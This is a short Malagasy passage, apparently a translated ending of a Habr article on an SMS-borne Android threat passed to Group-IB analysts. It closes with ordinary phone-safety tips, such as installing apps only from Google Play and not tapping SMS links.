    Soa ihany fa nivadika ho manam-pahaizana manokana momba ny fiarovana an-tserasera ilay olona nahazo ny hafatra SMS voalaza tany am-piandohan'ny lahatsoratra. Noho izany, tsy mitovy amin'ilay voalaza teo aloha ny tena dikan-teny tsy misy tale: nahazo SMS mahaliana ny olona iray, ary avy eo dia nomeny ny ekipan'ny Group-IB Threat Hunting Intelligence. Ny vokatry ny fanafihana dia ity lahatsoratra ity. Famaranana mahafinaritra, sa tsy izany? Na izany aza, tsy ny tantara rehetra dia mifarana amin'ny fomba mahomby, ary mba tsy ho toy ny fanapahan-kevitry ny tale miaraka amin'ny fahaverezan'ny vola ny anao, amin'ny ankamaroan'ny toe-javatra dia ampy ny manaraka ireto fitsipika efa ela ireto:

    • aza mametraka rindranasa ho an'ny fitaovana finday misy Android OS avy amin'ny loharano hafa ankoatra ny Google Play
    • Rehefa mametraka fampiharana dia tandremo manokana ny zo nangatahan'ny fampiharana
    • tandremo ny fanitarana ny rakitra alaina
    • apetraho tsy tapaka ny fanavaozana OS Android
    • aza mitsidika loharano mampiahiahy ary aza misintona rakitra avy any
    • Aza tsindrio ny rohy voaray amin'ny hafatra SMS.

Source: www.habr.com

Add a comment